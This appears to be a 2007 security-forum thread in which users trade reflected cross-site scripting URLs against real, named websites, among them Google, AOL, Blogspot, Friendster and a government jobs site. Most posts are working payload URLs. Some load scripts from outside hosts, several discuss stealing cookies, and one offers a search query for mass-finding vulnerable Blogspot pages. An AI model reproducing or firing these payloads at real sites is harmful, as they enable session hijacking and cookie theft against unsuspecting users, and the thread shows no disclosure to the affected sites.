maluc Wrote:
-------------------------------------------------------
> from Luny's disclosure under Redirect's Edition
>
> http://www.webmd.com/click2.asp?redirect=javascrip
> t:alert('XSS')
>
> it's a meta redirect
>
> -maluc

Nice maluc. Also, I wanted to mention that a few months back I found a few xss vulns on their forums too when posting new threads. Heres one vector:


<img src=javascript:alert(&#x27;xss&#x27;)>

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

http://www.google.com/support/pack/?hl=en&gl=hk%27%29;alert(document.cookie);//

Can also be used for gmail, nice find hong!

http://base.google.com/base/s2?a_n0=%3Cscript%3Ealert('XSS')%3C/script%3E&a_y0=9&hl=en&gl=US



Edited 1 time(s). Last edit at 01/12/2007 02:27PM by Ghozt.

I'm pretty sure I can make a persistent XSS in Google, I just need to mess around with it a little.

What a waste of time.. just a regular XSS in Google profiles, and ftp://uploads.google.com doesn't accept HTML files. :(



Edited 1 time(s). Last edit at 01/12/2007 05:10PM by Ghozt.

some xss out of my golden box...

yeh, my penis is very long ;-)

http://joblo.com/tellafriend.php?id=14018'%22%3E%3Cscript%20src=http://mybeNi.rootzilla.de/mybeNi/xw.js%3E%3C/script%3E

wah i got loads of beautiful xss but i dont really wanna disclose em :(

http://aolmobile.aol.com/portal/regWidget.jsp?popup=%22%3C/script%3E%3Cscript%3Ealert('xss');%3C/script%3E

More on aol.

http://www.google.com/url?q=http://services.google.com/tcbin/tc.py?xss=%22%29;alert%28%22xss%22%29;//

It works on IE.

- Hong

Hong Wrote:
-------------------------------------------------------
> http://www.google.com/url?q=http://services.google
> .com/tcbin/tc.py?xss=%22%29;alert%28%22xss%22%29;/
> /
>
> It works on IE.

A new one.
http://www.google.com/url?q=http://services.google.com/tcbin/tc.py?hl=zh_TW%5cx22%5cx3e%5cx3c/iframe%5cx3e%5cx3cscript%5cx3ealert(%5cx27xss%5cx27)%5cx3c/script%5cx3e
This also works on Firefox.
The previous one using "); to end the document.write, so it needs redirection to replace %22 by ", and only work on IE, Firefox won't work because it doesn't replace %22 by ".
This one just let document.write to write our XSS vector, and Firefox replaces %5c by \.

- Hong

Good find Hong. One of the only bad things to note is that it won't work if you're logged in to a gmail/google account; I imagine this devalues cookie stealing using this vector, might be wrong though.

Mkay Hong, but does it only alow an alert? or also .js insertions?

I got kinda bored, and was downloading movie clips for some music, and whala!
http://www.moviewavs.com/php/sounds/?id=bst&media=WAVS&type=Movies&movie=%22%20onmouseover=alert(&quote=wolverines.txt&file=xss/);%3E%3Ctextarea%20style='visibility:%20hidden;'%3E.wav

Yeah, I was that bored.
There are way more in this site ^.^

lawlerskates and lmao missielz
http://www.r0xes.net / http://www.7na.org

After reading this: http://www.sap.info/index.php4?ACTION=noframe&url=http://www.sap.info/public/INT/int/index/Category-28943c61b1e60d84b-int/0/articlesVersions-624545865ebc042ac

I found this: http://www.sap.info/index.php4?ACTION=noframe&url=javascript:alert(%27XSS%27%29

- RSnake
Gotta love it. http://ha.ckers.org

This one is pretty funny considering the domain name ;)

http://wwww.unsecured-systems.com/%3C/title%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E.cfm?pt=2&vid=1168830594_1X01X539023189&rpt=3&kt=1

pretty popular website

http://www.friendster.com/usersearch.php?search=1&country=US&usearch=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

http://www.netscape.com/viewstory/2007/01/09/sealand-for-sale-worlds-smallest-country-and-most-secure-data-center/?url=javascript:alert%28%22%58%53%53%22%29

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/14/2007 10:00PM by rsnake.

SystemOfAHack
Oh, I don't know that it won't work if you're logged in.
It seems that cookie stealing using this vector only works when google won't change cookie after user logged out.

- Hong

jungsonn
You can do a js insertion. Here it is:
http://www.google.com/url?q=http://services.google.com/tcbin/tc.py?hl=%5cx22%5cx3e%5cx3c%5cx2fiframe%5cx3e%5cx3cscript%5cx20src%5cx3dhttp%5cx3a%5cx2f%5cx2fha.ckers.org%5cx2fxss.js%5cx3e%5cx3c%5cx2fscript%5cx3e

- Hong

http://yellowpages.aol.com/main.adp?_dirph1=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirph2=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirph3=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirpid=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirquery=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dircat=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_diraddress=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&&_dirzip=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dircity=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirstate=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirlat=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirlong=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirdma=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dby=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_dirnamesearch=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E&_diraction=phone&brand=aolyp

http://www.anagramgenius.com/server.php?source_text=%3Cscript+src%3Dhttp%3A%2F%2Fckers.org%2Fs%3E%3C%2Fscript%3E

http://www.anagramgenius.com/server.php?errormsg=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E

Hong Wrote:
-------------------------------------------------------
> jungsonn
> You can do a js insertion. Here it is:
> http://www.google.com/url?q=http://services.google
> .com/tcbin/tc.py?hl=%5cx22%5cx3e%5cx3c%5cx2fiframe
> %5cx3e%5cx3cscript%5cx20src%5cx3dhttp%5cx3a%5cx2f%
> 5cx2fha.ckers.org%5cx2fxss.js%5cx3e%5cx3c%5cx2fscr
> ipt%5cx3e


Very smart Hong! that's more like it!

http://www.crimelibrary.com/features/fea_printPage.asp?curPage=&thisFile=<script>alert('xss')</script>

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

http://kuza55.blogspot.com/search?q=%3C/title%3E%3Cscript%3Ealert('hi')%3C/script%3E

Lol, sorry Kuza. I was looking for the article about AJAX on your blog, i searched for it and instinctively included an < i checked the source and saw that it wasnt filtered, one thing led to another and here it is...

I no the site isnt owned by you, so its not really your problem, more of a generic blogspot issue i would have thought, although i havent and don't use blogspot so im not 100% on that.

well the only blogspot i goto, http://jeremiahgrossman.blogspot.com isnt affected .. so i wonder if it's a bug in the particular theme kuza uses? either way, it's a nice find. i don't have a blog there so i can't check whether it's able to access it's authentication cookies or not.

anyway, very good find.

-maluc

That is a good find! I'd like to know the answer to that.... that could affect a lot of people negatively, depending on how pervasive the theme is.

- RSnake
Gotta love it. http://ha.ckers.org

I just tested kuza55 find on a number of blogspot domains and it worked on all of them (except 1 which 404 on the search page)


http://abcand123okinawa.blogspot.com/search?q=%3C/title%3E%3Cscript%3Ealert('hi')%3C/script%3E
http://iambenyouarenot.blogspot.com/search?q=%3C/title%3E%3Cscript%3Ealert('hi')%3C/script%3E
http://eunice517.blogspot.com/search?q=%3C/title%3E%3Cscript%3Ealert('hi')%3C/script%3E

Googledork
http://www.google.com.au/search?hl=en&q=site%3Ablogspot.com%2Fsearch%3Fq&btnG=Google+Search&meta=

Quote

Results 1 - 10 of about 160,000

rsnake - this isn't related to a theme. it appears to be a blogger issue.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 01/17/2007 08:04PM by digi7al64.

http://www.altavista.com/web/results?itag=ody&q=%3Csccript%3Ealert%28document.cookie%29%3C%2Fscript%3E&kgs=1&kls=0


may not be full fledged vulnerability but i think its a vulnerability atleast...if i srch for a wrong string n if the string it suggests is a script it's being executed...may be we can craft urls using this n bombing them in their site

https://fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert('xss');%3C/script%3E

Seriously. No filtering. Whatsoever. At all.

Lockdown Wrote:
-------------------------------------------------------
> https://fbijobs.gov/searchresult.asp?SearchString=
> %3Cscript%3Ealert('xss');%3C/script%3E
>
> Seriously. No filtering. Whatsoever. At all.

Originally posted on milw0rm by Easy, good find nonetheless

http://vonage.com/search_results_gsa.php?search_string=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&search.x=0&search.y=0

thought id start looking at alexa's top 100

http://www.tigerdirect.com/applications/email/d_error.asp?email=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&listcode=MH&p=